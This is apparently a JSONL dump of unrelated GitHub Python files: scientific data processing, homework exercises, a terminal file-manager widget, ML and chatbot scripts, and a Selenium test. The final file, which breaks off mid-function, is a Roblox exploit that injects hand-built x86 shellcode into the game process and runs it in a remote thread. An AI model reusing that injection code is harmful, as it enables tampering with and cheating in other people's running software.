smoothing=25, z=None):\n\n if behavior == 'dRotLabZpos':\n behavior = 'dRotLabZ'\n clip = 'pos'\n elif behavior == 'dRotLabZneg':\n behavior = 'dRotLabZ'\n clip = 'neg'\n else:\n clip = None\n\n ### get orginal timestamps ###\n camera_rate = 1/fps * 1000 # camera frame rate in ms\n x_original = np.arange(0,expt_len,camera_rate)\n\n ### smooth ###\n fictrac_smoothed = scipy.signal.savgol_filter(np.asarray(fictrac[behavior]),smoothing,3)\n\n ### clip if desired ###\n if clip == 'pos':\n fictrac_smoothed = np.clip(fictrac_smoothed, a_min=0, a_max=None)\n elif clip == 'neg':\n fictrac_smoothed = np.clip(fictrac_smoothed, a_min=None, a_max=0)*-1\n\n ### interpolate ###\n fictrac_interp_temp = interp1d(x_original, fictrac_smoothed, bounds_error = False)\n xnew = np.arange(0,expt_len,resolution) #0 to last time at subsample res\n if timestamps is None:\n fictrac_interp = fictrac_interp_temp(xnew)\n else:\n fictrac_interp = fictrac_interp_temp(timestamps[:,z])\n\n ### convert units for common cases ###\n sphere_radius = 4.5e-3 # in m\n if behavior in ['dRotLabY']:\n ''' starts with units of rad/frame\n * sphere_radius(m); now in m/frame\n * fps; now in m/sec\n * 1000; now in mm/sec '''\n \n fictrac_interp = fictrac_interp * sphere_radius * fps * 1000 # now in mm/sec\n \n if behavior in ['dRotLabZ']:\n ''' starts with units of rad/frame\n * 180 / np.pi; now in deg/frame\n * fps; now in deg/sec '''\n \n fictrac_interp = fictrac_interp * 180 / np.pi * fps\n \n # Replace Nans with zeros (for later code)\n np.nan_to_num(fictrac_interp, copy=False);\n \n return 
fictrac_interp","repo_name":"ClandininLab/brainsss","sub_path":"brainsss/fictrac.py","file_name":"fictrac.py","file_ext":"py","file_size_in_byte":6847,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"21"} +{"seq_id":"18152755235","text":"# task1\r\n# рекурсивная функция получения факториала числа n\r\n\r\ndef factorial(n):\r\n while n != 0:\r\n return n * (factorial(n - 1))\r\n else:\r\n return 1\r\n\r\n\r\nnum = int(input(\"Введите число: \"))\r\nprint(factorial(num))\r\n\r\n# последовательность фиббоначи\r\nn = int(input(\"число для фиббоначе: \"))\r\na, b = 0, 1\r\nwhile b <= n:\r\n a, b = b, a + b\r\n print(a)\r\n\r\n# создать словарь из двух словарей и отсортировать по длинне ключей\r\ndict_1 = {'верный': [11, 55.2, 'слон'],\r\n 'фиолетовый': 15, 'орда': 'восемь'}\r\ndict_2 = {'ода': {52, 99, 2}, 'сороконожка': {110, 'слово', 15}}\r\ndict_3 = {}\r\n# добавляем в новый словарь\r\ndict_3.update(dict_1)\r\ndict_3.update(dict_2)\r\n\r\nnew_dict = {}\r\nlist_k = list(dict_3.keys())\r\n# сортировка ключей\r\nlist_k.sort(key=len)\r\nfor i in list_k:\r\n new_dict[i] = dict_3[i]\r\nprint(new_dict)\r\n\r\n\r\n# task2\r\n# без знаков припинания\r\ndef task_1(a):\r\n new_str = ''\r\n f = ['.', ',', '?']\r\n for i in a:\r\n if i not in f:\r\n new_str += i\r\n return new_str\r\n\r\n\r\n# без букв верхнего регистра\r\ndef task_2(a):\r\n new_str = ''\r\n for i in a:\r\n if i.isupper():\r\n pass\r\n else:\r\n new_str += i\r\n return new_str\r\n\r\n\r\n# всю строку в верхнем регистре\r\ndef task_3(a):\r\n return a.upper()\r\n\r\n\r\n# изменить регистр вверхний - нижний и наоборот\r\ndef task_4(a):\r\n new_str = ''\r\n for i in a:\r\n if i.isupper():\r\n new_str += i.lower()\r\n else:\r\n new_str += i.upper()\r\n return new_str\r\n\r\n\r\n# заменить все знаки препинания на пробелы\r\ndef task_5(a):\r\n new_str = ''\r\n f = '.,?'\r\n for i in a:\r\n if i in f:\r\n new_str += \" \"\r\n else:\r\n new_str += i\r\n return new_str\r\n\r\n\r\nstring_ = \"Что это было?...Я не ожидал увидеть подобного, но мне придется принять решение\"\r\nprint(task_1(string_))\r\nprint(task_2(string_))\r\nprint(task_3(string_))\r\nprint(task_4(string_))\r\nprint(task_5(string_))\r\n","repo_name":"Nastassia2334/HomeWork","sub_path":"lesson_32_Shelepen/lesson_32_practice_Shelepen.py","file_name":"lesson_32_practice_Shelepen.py","file_ext":"py","file_size_in_byte":2400,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"73038536373","text":"# This file is part of ranger, the console file manager.\n# License: GNU GPL version 3, see the file \"AUTHORS\" for details.\n\n\"\"\"The pager displays text and allows you to scroll inside it.\"\"\"\n\nfrom __future__ import (absolute_import, division, print_function)\n\nimport curses\nimport logging\n\nfrom ranger.gui import ansi\nfrom ranger.ext.direction import Direction\nfrom ranger.ext.img_display import ImgDisplayUnsupportedException\n\nfrom . 
import Widget\n\n\nLOG = logging.getLogger(__name__)\n\n\n# TODO: Scrolling in embedded pager\nclass Pager(Widget): # pylint: disable=too-many-instance-attributes\n source = None\n source_is_stream = False\n\n old_source = None\n old_scroll_begin = 0\n old_startx = 0\n need_clear_image = False\n need_redraw_image = False\n max_width = None\n\n def __init__(self, win, embedded=False):\n Widget.__init__(self, win)\n self.embedded = embedded\n self.scroll_begin = 0\n self.startx = 0\n self.markup = None\n self.lines = []\n self.image = None\n self.image_drawn = False\n\n def _close_source(self):\n if self.source and self.source_is_stream:\n try:\n self.source.close()\n except OSError as ex:\n LOG.error('Unable to close pager source')\n LOG.exception(ex)\n\n def open(self):\n self.scroll_begin = 0\n self.markup = None\n self.max_width = 0\n self.startx = 0\n self.need_redraw = True\n\n def clear_image(self, force=False):\n if (force or self.need_clear_image) and self.image_drawn:\n self.fm.image_displayer.clear(self.x, self.y, self.wid, self.hei)\n self.need_clear_image = False\n self.image_drawn = False\n\n def close(self):\n if self.image:\n self.need_clear_image = True\n self.clear_image()\n self._close_source()\n\n def destroy(self):\n self.clear_image(force=True)\n Widget.destroy(self)\n\n def finalize(self):\n self.fm.ui.win.move(self.y, self.x)\n\n def draw(self):\n if self.need_clear_image:\n self.need_redraw = True\n\n if self.old_source != self.source:\n self.old_source = self.source\n self.need_redraw = True\n\n if self.old_scroll_begin != self.scroll_begin or \\\n self.old_startx != self.startx:\n self.old_startx = self.startx\n self.old_scroll_begin = self.scroll_begin\n self.need_redraw = True\n\n if self.need_redraw:\n self.win.erase()\n self.need_redraw_image = True\n self.clear_image()\n\n if not self.image:\n line_gen = self._generate_lines(\n starty=self.scroll_begin, startx=self.startx)\n\n for line, i in zip(line_gen, range(self.hei)):\n self._draw_line(i, line)\n\n self.need_redraw = False\n\n def draw_image(self):\n if self.image and self.need_redraw_image:\n self.source = None\n self.need_redraw_image = False\n try:\n self.fm.image_displayer.draw(self.image, self.x, self.y,\n self.wid, self.hei)\n except ImgDisplayUnsupportedException:\n self.fm.settings.preview_images = False\n except Exception as ex: # pylint: disable=broad-except\n self.fm.notify(ex, bad=True)\n else:\n self.image_drawn = True\n\n def _draw_line(self, i, line):\n if self.markup is None:\n self.addstr(i, 0, line)\n elif self.markup == 'ansi':\n try:\n self.win.move(i, 0)\n except curses.error:\n pass\n else:\n for chunk in ansi.text_with_fg_bg_attr(line):\n if isinstance(chunk, tuple):\n self.set_fg_bg_attr(*chunk)\n else:\n self.addstr(chunk)\n\n def move(self, narg=None, **kw):\n direction = Direction(kw)\n if direction.horizontal():\n self.startx = direction.move(\n direction=direction.right(),\n override=narg,\n maximum=self.max_width,\n current=self.startx,\n pagesize=self.wid,\n offset=-self.wid + 1)\n if direction.vertical():\n movement = dict(\n direction=direction.down(),\n override=narg,\n current=self.scroll_begin,\n pagesize=self.hei,\n offset=-self.hei + 1)\n if self.source_is_stream:\n # For streams, we first pretend that the content ends much later,\n # in case there are still unread lines.\n desired_position = direction.move(\n maximum=len(self.lines) + 9999,\n **movement)\n # Then, read the new lines as needed to produce a more accurate\n # maximum for the movement:\n 
self._get_line(desired_position + self.hei)\n self.scroll_begin = direction.move(\n maximum=len(self.lines),\n **movement)\n\n def press(self, key):\n self.fm.ui.keymaps.use_keymap('pager')\n self.fm.ui.press(key)\n\n def set_image(self, image):\n if self.image:\n self.need_clear_image = True\n self.image = image\n self._close_source()\n self.source = None\n self.source_is_stream = False\n\n def set_source(self, source, strip=False):\n if self.image:\n self.image = None\n self.need_clear_image = True\n self._close_source()\n\n self.max_width = 0\n if isinstance(source, str):\n self.source_is_stream = False\n self.lines = source.splitlines()\n if self.lines:\n self.max_width = max(len(line) for line in self.lines)\n elif hasattr(source, '__getitem__'):\n self.source_is_stream = False\n self.lines = source\n if self.lines:\n self.max_width = max(len(line) for line in source)\n elif hasattr(source, 'readline'):\n self.source_is_stream = True\n self.lines = []\n else:\n self.source = None\n self.source_is_stream = False\n return False\n self.markup = 'ansi'\n\n if not self.source_is_stream and strip:\n self.lines = [line.strip() for line in self.lines]\n\n self.source = source\n return True\n\n def click(self, event):\n n = 1 if event.ctrl() else 3\n direction = event.mouse_wheel_direction()\n if direction:\n self.move(down=direction * n)\n return True\n\n def _get_line(self, n, attempt_to_read=True):\n assert isinstance(n, int), n\n try:\n return self.lines[n]\n except (KeyError, IndexError):\n if attempt_to_read and self.source_is_stream:\n try:\n for line in self.source:\n if len(line) > self.max_width:\n self.max_width = len(line)\n self.lines.append(line)\n if len(self.lines) > n:\n break\n except (UnicodeError, IOError):\n pass\n return self._get_line(n, attempt_to_read=False)\n return \"\"\n\n def _generate_lines(self, starty, startx):\n i = starty\n if not self.source:\n raise StopIteration\n while True:\n try:\n line = self._get_line(i).expandtabs(4)\n if self.markup == 'ansi':\n line = ansi.char_slice(line, startx, self.wid) + ansi.reset\n else:\n line = line[startx:self.wid + startx]\n yield line.rstrip().replace('\\r\\n', '\\n')\n except IndexError:\n raise StopIteration\n i += 1\n","repo_name":"LiuFang816/SALSTM_py_data","sub_path":"python/ranger_ranger/ranger-master/ranger/gui/widgets/pager.py","file_name":"pager.py","file_ext":"py","file_size_in_byte":8082,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"21"} +{"seq_id":"17639387566","text":"\"\"\"\n\ncreated by huash06 at 2015-07-14\n\n\"\"\"\n__author__ = 'huash06'\n\nimport os\nimport sys\nimport functools\nimport collections\nimport itertools\n\n# sys.stdin = open(\"input.txt\", \"r\")\n\n\ndef collectApple(tree):\n if not tree:\n return 0\n left = sorted(filter(lambda x: x[0] < 0, tree))\n right = sorted(filter(lambda x: x[0] > 0, tree))\n\n res = 0\n if len(left) > len(right):\n res += sum([x[1] for x in right])\n res += sum([x[1] for x in left[len(left) - len(right) - 1:]])\n else:\n res += sum([x[1] for x in left])\n res += sum([x[1] for x in right[:min(len(left) + 1, len(right))]])\n return res\n\n\nN = int(input())\n\ntree = []\nfor i in range(N):\n tree.append([int(x) for x in input().split()])\nprint(collectApple(tree))\n\n\n\n\n","repo_name":"shhuan/algorithms","sub_path":"py/codeforces/312A.py","file_name":"312A.py","file_ext":"py","file_size_in_byte":771,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} 
+{"seq_id":"4335406231","text":"# fit the sigmoid curve and calculate decision boundary using given dataset\n\n# a cheat sheet:\n# in an optimization loop\n# first calculate hypothesis for each datapoint x in X: h = 1 / (1 + exp(-theta0-theta1*x))\n# then calculate crossentropy: -y*log(h) - (1-y)*log(1-h)\n# and cost: sum(crossentropy) / len(x)\n# next calculate derivatives for theta 0 and theta1 (similar to those in linear regression)\n# theta0_deriv = sum(h - y) / len(y), theta1_deriv = sum((h-y)*X)\n# and then update tbheta weights\n# theta = theta - lr*theta_deriv\n\n# check if cost is getting lower through iterations\n# if not, try to modify the learning rate\n\n# calculating decision boundary might look like this:\n# theta[0] + theta[1]*x = 0\n# theta[1]*x = -theta[0]\n# x = -theta[0]/theta[1]\n\n# the result might look like below\n\nfrom matplotlib import pyplot as plt\nimport numpy as np\n\nX = np.array([1, 2, 3, 4, 5, 6, 7, 8, 9, 15, 25], dtype=np.float32)\ny = np.array([0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1], dtype=np.float32)\n\ntheta = np.array([0, 0], dtype=np.float32)\n\n# optimization loop\niterations = 10000\nmin_cost = 100\neps = 0.00001\nlr = 0.1\ntheta_deriv = [0, 0]\nfor i in range(iterations):\n\n h = 1/(1 + np.exp(-theta[0] - theta[1] * X))\n crossentropy = -y * np.log(h + eps) - (1 - y) * np.log(1 - h + eps)\n cost = sum(crossentropy) / len(X)\n\n theta_deriv[0] = sum(h - y) / len(y)\n theta_deriv[1] = sum((h - y) * X) / len(y)\n\n for j in range(len(theta)):\n theta[j] = theta[j] - lr * theta_deriv[j]\n\n print(\"iteration: \", str(i + 1), \", cost: \", cost)\n\n if np.abs(min_cost - cost) < eps:\n break\n\n min_cost = cost\n\nprint(theta)\n\nx_linspace = np.linspace(min(X), max(X), 100)\ny_linspace = 1 / (1 + np.exp(-theta[0] - theta[1]*x_linspace))\n\nplt.plot(X, y, 'x')\nplt.plot(x_linspace, y_linspace, '-')\nborder_indexes = np.where(y_linspace >=0.5-eps)\n# print(border_indexes)\nplt.axvline(x=x_linspace[border_indexes[0][0]])\nplt.show()\n\n","repo_name":"DorotaDR/Machine_Learning_LAB","sub_path":"lab-logistic-reagression/ex1.py","file_name":"ex1.py","file_ext":"py","file_size_in_byte":1939,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"34307711551","text":"'''Wikifies given cluster'''\n\nfrom collections import Counter\nimport re\nimport nltk\nfrom nltk.collocations import *\n\nclass Wikification:\t\n\tdef __init__(self, events):\n\t\tself.stoplist = []\n\t\twith open(\"corpus/stopwords.txt\") as stopwords:\n\t\t\tfor stopword in stopwords:\n\t\t\t\tself.stoplist.append(stopword.strip())\n\t\tself.stoplist.extend(['http', 'het'])\n\t\tself.events = list(events)\n\t\tself.wikifi()\n\t\n\tdef wikifi(self):\n\t\tevents = []\n\t\t\n\t\tbigram_measures = nltk.collocations.BigramAssocMeasures()\n\n\t\tfor candidates, label in self.events:\n\t\t\ttweets = \"\"\n\t\t\tfor candidate in candidates:\n\t\t\t\ttweets += \" \"+ candidate['text'] \t\t\n\t\t\ttokens = self.tokenize(tweets)\n\t\t\tfinder = BigramCollocationFinder.from_words(tokens)\n\t\t\tstring = \"\"\n\t\t\tfinder.apply_freq_filter(3)\n\t\t\tfor firstword, secondword in finder.nbest(bigram_measures.pmi, 10):\n\t\t\t\tstring += \" {} {} \".format(firstword, secondword)\n\t\t\t#ngrams = []\n\t\t\t#for ngram, score in self.ngrams(tweets,3).most_common(50):\t\t\t\n\t\t\t\t#ngrams.append((' '.join(ngram)))\n\n\t\t\tevents.append((candidates, label, str(string)))\n\t\treturn events\n\n\n\n\tdef tokenize(self, string):\n\t\tstring = 
re.sub(r'^https?:\\/\\/.*[\\r\\n]*', '', string, flags=re.MULTILINE)\n\t\tstring = re.sub('[!@#$.,?]', '', string)\n\t\tstring = self.convert(string)\n\t\treturnList = [token for token in string.split() if token not in self.stoplist and len(token) > 2 and token.isalpha() ]\n\t\treturn returnList\n\n\tdef convert(self, token):\n\t s1 = re.sub('(.)([A-Z][a-z]+)', r'\\1 \\2', token)\n\t return re.sub('([a-z0-9])([A-Z])', r'\\1 \\2', s1).lower()\n\n\tdef eventDict(self):\n\t\treturn defaultdict(list)\n\n\tdef getWiki(self):\n\t\treturn self.wikifi()\n\n\tdef ngrams(self, tweets, n):\n\t\tngrams = Counter()\t\n\t\tfor iteration in range(n):\n\t\t\tfor tweet in tweets:\n\t\t\t\tngram = zip(*[self.prepareTokens(tweet['text'])[i:] for i in range(iteration)])\n\t\t\t\tngramFiltered = [token for token in ngram if token not in self.stoplist]\n\t\t\t\tngrams.update(ngramFiltered)\n\t\treturn ngrams\n\n\tdef prepareTokens(self, tweet):\n\n\t\n\t\treturn tweet.split()","repo_name":"daviddekleer/EventDetective","sub_path":"Wikification.py","file_name":"Wikification.py","file_ext":"py","file_size_in_byte":2007,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"38273696909","text":"import os\nimport aiml\n\nBRAIN_FILE= \"../brain.dump\"\n\nk = aiml.Kernel()\n\n# Для увеличения скорости запуска бота необходимо\n# можно сохранить разобранные файлы аимл как\n# свалка. Этот код проверяет, существует ли дамп и\n# в противном случае загружает аимл из файлов xml\n# и сохраняет дамп мозга.\nif os.path.exists(BRAIN_FILE):\n print(\"Loading from brain file: \" + BRAIN_FILE)\n k.loadBrain(BRAIN_FILE)\nelse:\n print(\"Parsing aiml files\")\n k.bootstrap(learnFiles=\"std-startup.aiml\", commands=\"load aiml b\")\n print(\"Saving brain file: \" + BRAIN_FILE)\n k.saveBrain(BRAIN_FILE)\n\n\ndef getAimlResponse(message):\n response = k.respond(message)\n return response","repo_name":"Sevochka/chat-bot","sub_path":"bots/aiml_bot.py","file_name":"aiml_bot.py","file_ext":"py","file_size_in_byte":846,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"37440604086","text":"#funtion returns weather items are sorted or not boolean\n#creating the function and passing in items\ndef is_sorted(items):\n # setting variable copy to equal items\n copy = items[:]\n #calling sort method on copy\n copy.sort()\n # if copy is equal to items it returns true \n return copy == items\n\ndef bubble_sort(items):\n #set is sorted to true\n is_sorted = True\n # set a counter to 0\n counter = 0\n # while items_is_sorted we want to then change is sorted to false\n while(is_sorted):\n #set is sorted to false \n is_sorted = False\n # this is the for loop to loop trhough the items\n for i in range(len(items) - counter - 1):\n #if the item we are looking at is larger thane the item to its right we want to swap them \n if items[i] > items[i+1]:\n # swap the items positioins\n items[i], items[i+1] = items[i+1], items[i]\n # is sorted now becomes troue\n is_sorted = True\n # incremantation of the counter to move though the array\n counter += 1\n\ndef selection_sort(items):\n #finding the minimum item and swaping it with the first unsorted item and repeating until all items are in soreted order\n #for loop to loop throught the items\n items_length = range(0, len(items)-1)\n for i in items_length:\n #set min value to i\n min_value = i\n#nested for loop to set j value\n for j in range(i+1, len(items)):\n if items[j] < items[min_value]:\n 
min_value = j\n \n items[min_value], items[i] = items[i], items[min_value]\n return items\n\n\ndef insertion_sort(items):\n item_length = range(1, len(items))\n for i in item_length:\n #element to be compared\n unsorted_value = items[i]\n\n #comparing the current element with the sorted portion and swapping\n\n while items[i-1] > unsorted_value and i > 0:\n items[i], items[i-1] = items[i-1], items[i]\n i -= 1\n #returning items \n return items","repo_name":"MariomcgeeArt/CS2.1-sorting_algorithms-","sub_path":"iterative_sorting2.py","file_name":"iterative_sorting2.py","file_ext":"py","file_size_in_byte":2069,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"30638522130","text":"\"\"\"\nSolution for 917. Reverse Only Letters\n\"\"\"\n\nclass Solution:\n \"\"\"\n Runtime: 32 ms, faster than 91.10% of Python3 online submissions for Reverse Only Letters.\n Memory Usage: 13.1 MB, less than 82.16% of Python3 online submissions for Reverse Only Letters.\n \"\"\"\n def reverseOnlyLetters(self, S):\n \"\"\"\n Given a string S, return the \"reversed\" string where all characters that are not a letter\n stay in the same place, and all letters reverse their positions.\n\n\n\n Example 1:\n\n Input: \"ab-cd\"\n Output: \"dc-ba\"\n Example 2:\n\n Input: \"a-bC-dEf-ghIj\"\n Output: \"j-Ih-gfE-dCba\"\n Example 3:\n\n Input: \"Test1ng-Leet=code-Q!\"\n Output: \"Qedo1ct-eeLg=ntse-T!\"\n Args:\n S: str value to reverse only letters\n\n Returns:\n str: where all the letters from S are reversed\n \"\"\"\n i, j = 0, len(S) - 1\n S = list(S)\n\n while i <= j:\n while i < len(S) and not S[i].isalpha():\n i += 1\n\n if i <= j:\n while j >= 0 and not S[j].isalpha():\n j -= 1\n\n S[i], S[j] = S[j], S[i]\n i += 1\n j -= 1\n else:\n break\n\n return ''.join(S)\n","repo_name":"KKosukeee/CodingQuestions","sub_path":"LeetCode/917_reverse_only_letters.py","file_name":"917_reverse_only_letters.py","file_ext":"py","file_size_in_byte":1303,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"23606544621","text":"\"\"\" Problem specific image split, Scope of improvement and generalization\"\"\"\nfrom PIL import Image\nimport os\n\n\nclass imagesplit:\n\n def split_image_by_map(self, image_path, map_file_name, output_folder, identifier):\n \"\"\"\n Split parking lot image based on one map file\n :param image_path:\n :param map_file_name:\n :param output_folder:\n :param identifier:\n :return:\n \"\"\"\n img = Image.open(image_path)\n basename = os.path.basename(image_path)\n filename, extension = os.path.splitext(basename)\n\n with open(map_file_name) as fp:\n count = 1\n for line in fp:\n coors = line.split(\",\")\n coors = (int(coors[0]), int(coors[1]), int(coors[2]), int(coors[3]))\n img.crop(coors).save(output_folder + identifier + str(count) + extension)\n count += 1\n\n def split_image(self, image_path, input_map_path, output_image_path):\n \"\"\"\n Split images based on map file input\n :param image_path:\n :param input_map_path:\n :param output_image_path:\n :return:\n \"\"\"\n basename = os.path.basename(image_path)\n filename, extension = os.path.splitext(basename)\n image_dir = output_image_path + filename + \"/\"\n\n if not os.path.exists(image_dir):\n os.makedirs(image_dir)\n\n self.split_image_by_map(image_path, input_map_path + \"/L1.txt\", image_dir, \"A_\")\n self.split_image_by_map(image_path, input_map_path + \"/L2.txt\", image_dir, \"B_\")\n self.split_image_by_map(image_path, input_map_path 
+ \"/L3.txt\", image_dir, \"C_\")\n\n return image_dir\n","repo_name":"jaymaity/CarDetectionInParkinglot","sub_path":"common/imageprocess/imagesplit.py","file_name":"imagesplit.py","file_ext":"py","file_size_in_byte":1687,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"21"} +{"seq_id":"74034608374","text":"#!/usr/bin/env python3\n\nimport numpy as np\nimport pymc3 as pm\nimport theano\nimport theano.tensor as tt\n\nfrom .utils import format_data\n\n\ndef make_ind_model(subject_data, subject_gaze_data, gaze_bias=True, zerorol=1e-10):\n \"\"\"\n Make single subject probabilistic satisficing choice model.\n\n Args\n ---\n subject_data_df (dataframe): aggregate response\n data of a single subject\n subject_gaze_data (dataframe): aggregate gaze\n data of a single subject\n gaze_bias (bool): whether to activate gaze bias\n or to set gamma=1 and zeta=0\n zerotol (float): numerical stability term\n\n Returns\n ---\n PyMC3 model object\n \"\"\"\n\n assert len(subject_data['subject'].unique()) == 1, 'data_df contains more than 1 subject.'\n\n # format data\n data_dict = format_data(subject_data, subject_gaze_data)\n\n # make ind model\n with pm.Model() as ind_model:\n\n # likelihood mixture\n p_error = pm.Deterministic('p_error', tt.constant(0.05, dtype='float32'))\n\n # model paramaters\n v = pm.Uniform('v', 0, 0.001, testval=1e-7)\n alpha = pm.Uniform('alpha', 0, 0.001, testval=1e-7)\n tau = pm.Uniform('tau', 0, 10, testval=1)\n if gaze_bias:\n gamma = pm.Uniform('gamma', 0, 1, testval=0.5)\n zeta = pm.Uniform('zeta', 0, 10, testval=0.5)\n else:\n gamma = pm.Deterministic('gamma', tt.constant(1, dtype='float32'))\n zeta = pm.Deterministic('zeta', tt.constant(0, dtype='float32'))\n\n # stopping probability\n def stopping_probability(gaze_t, value_t, rt):\n time = tt.arange(1,gaze_t.shape[-1]+1)[None,:]\n # exclude items that were not looked at so far\n C = tt.where(tt.eq(gaze_t, tt.zeros_like(gaze_t)),\n tt.zeros_like(gaze_t),\n gaze_t * (value_t + zeta) + (1 - gaze_t) * gamma * value_t)\n q = v * time + alpha * tt.max(C, axis=1)\n q = tt.clip(q, 0, 1)\n Q = tt.cumprod(1 - q, axis=1)\n Q = tt.clip(Q, 0, 1)\n q_corrected = (Q[tt.cast(tt.arange(Q.shape[0]), dtype='int32'), tt.cast(rt-2, dtype='int32')] *\n q[tt.cast(tt.arange(q.shape[0]), dtype='int32'), tt.cast(rt-1, dtype='int32')])\n return q_corrected, C\n\n # logp\n def logp_ind(rt,\n choice,\n gaze_t,\n value_t,\n error_ll,\n zerotol):\n # compute stopping probability\n n_trials = value_t.shape[0]\n n_items = value_t.shape[1]\n q, C = stopping_probability(gaze_t, value_t, rt)\n # compute softmax choice probabilities\n sigma, _ = theano.scan(lambda i, tau, C, rt, n_items:\n tt.nnet.nnet.softmax(tau*C[tt.cast(tt.repeat(i, n_items), dtype='int32'),\n tt.arange(n_items, dtype='int32'),\n tt.cast(tt.repeat(rt[i]-1, n_items), dtype='int32')]).flatten(),\n sequences=[tt.cast(tt.arange(n_trials), dtype='int32')],\n non_sequences=[tau, C, rt, n_items])\n # combine with choice probabilities\n p = q * sigma[tt.arange(n_trials, dtype='int32'), tt.cast(choice, dtype='int32')]\n # mix likelihoods\n l = ((1-p_error) * p) + (p_error * error_ll)\n # safety\n l = tt.where(tt.isnan(l), 0., l)\n l = tt.where(tt.isinf(l), 0., l)\n return tt.log(l + zerotol)\n\n # data\n obs = pm.DensityDist('obs',\n logp=logp_ind,\n observed=dict(rt=data_dict['rt'],\n choice=data_dict['choice'],\n gaze_t=data_dict['gaze_t'],\n value_t=data_dict['value_t'],\n error_ll=data_dict['error_ll'],\n zerotol=zerorol))\n\n return 
ind_model\n","repo_name":"athms/many-item-choice","sub_path":"src/models/probabilistic_satisficing/make_model.py","file_name":"make_model.py","file_ext":"py","file_size_in_byte":4160,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"21"} +{"seq_id":"5625347140","text":"import time\nimport unittest\n\nfrom selenium import webdriver\nfrom selenium.webdriver.common.by import By\nfrom Funciones.Funciones import FuncionesGlobales\nfrom selenium.webdriver import ActionChains\n\nt=2\n\nclass BaseTest(unittest.TestCase):\n\n def setUp(self) -> None:\n self.driver = webdriver.Chrome(executable_path=\"C:\\Drivers\\chromedriver.exe\")\n self.driver.maximize_window()\n\n def test1(self):\n driver = self.driver\n f = FuncionesGlobales(driver)\n f.Navegar(\"https://demoqa.com/buttons\",t)\n\n f.Mouse_Double_Click(\"id\",\"doubleClickBtn\",t)\n\n \"\"\"\n elemento=driver.find_element(By.ID, \"doubleClickBtn\")\n act=ActionChains(driver)\n act.double_click(elemento).perform()\n \"\"\"\n time.sleep(t)\n\n def tearDown(self) -> None:\n d = self.driver\n d.close()\n\nif __name__ == \"__main__\":\n unittest.main()\n\n","repo_name":"LABUEZO/Aprendiendo-Git-GitHub","sub_path":"Mouse_actions/Double_click.py","file_name":"Double_click.py","file_ext":"py","file_size_in_byte":898,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"30028115403","text":"from Exploit import roblox\nfrom Instance import Instance\nfrom Memory import GetDataModel, float_to_hex\nfrom Players import Players\n\n\nDataModel = Instance(GetDataModel())\n\nprint(roblox.d2h(DataModel.getAddress()))\nPlayers = Players(DataModel.FindFirstChild(\"Players\"))\nworkspace = DataModel.GetChildren()[0]\n\nlocalPlayer = Players.GetLocalPlayer()\nplayerChar = workspace.FindFirstChild(localPlayer.GetName())\n\ndef BreakJoints(character : Instance):\n NewMemoryRegion = roblox.Program.allocate(100)\n NewMemAddress = NewMemoryRegion\n \n InstanceAddress = character.getAddress() #Change This\n FunctionAddress = character.GetBoundFunction(\"BreakJoints\").GetFunc()\n \n HexArray = ''\n MovIntoEcxOp = 'B9' + roblox.hex2le(roblox.d2h(InstanceAddress))\n CallOp = 'E8' + roblox.hex2le(roblox.calcjmpop(roblox.d2h(FunctionAddress),roblox.d2h(NewMemAddress + 5)))\n StoreOp = 'A3' + roblox.hex2le(roblox.d2h(NewMemAddress + 0x30))\n RetOp = 'C3'\n HexArray = MovIntoEcxOp + CallOp + StoreOp + RetOp\n roblox.Program.write_bytes(NewMemAddress,bytes.fromhex(HexArray),roblox.gethexc(HexArray))\n roblox.Program.start_thread(NewMemAddress)\n roblox.Program.free(NewMemAddress)\n\n\ndef MoveTo(character : Instance):\n NewMemoryRegion = roblox.Program.allocate(100)\n NewMemAddress = NewMemoryRegion\n \n InstanceAddress = character.getAddress() #Change This\n FunctionAddress = character.GetBoundFunction(\"MoveTo\").GetFunc()\n testx = 3.0\n testy = 4.0\n testz = 5.0\n HexArray = ''\n MovIntoEcxOp = 'B9' + roblox.hex2le(roblox.d2h(InstanceAddress))\n PushOPX = '68' + roblox.hex2le(roblox.d2h(int(float_to_hex(testx), 16)))\n PushOPY = '68' + roblox.hex2le(roblox.d2h(int(float_to_hex(testy), 16)))\n PushOPZ = '68' + roblox.hex2le(roblox.d2h(int(float_to_hex(testz), 16)))\n CallOp = 'E8' + roblox.hex2le(roblox.calcjmpop(roblox.d2h(FunctionAddress),roblox.d2h(NewMemAddress + 20)))\n StoreOp = 'A3' + roblox.hex2le(roblox.d2h(NewMemAddress + 0x30))\n RetOp = 'C3'\n HexArray = MovIntoEcxOp + PushOPZ + PushOPY + PushOPX + CallOp + StoreOp + RetOp\n #print(StoreOp)\n 
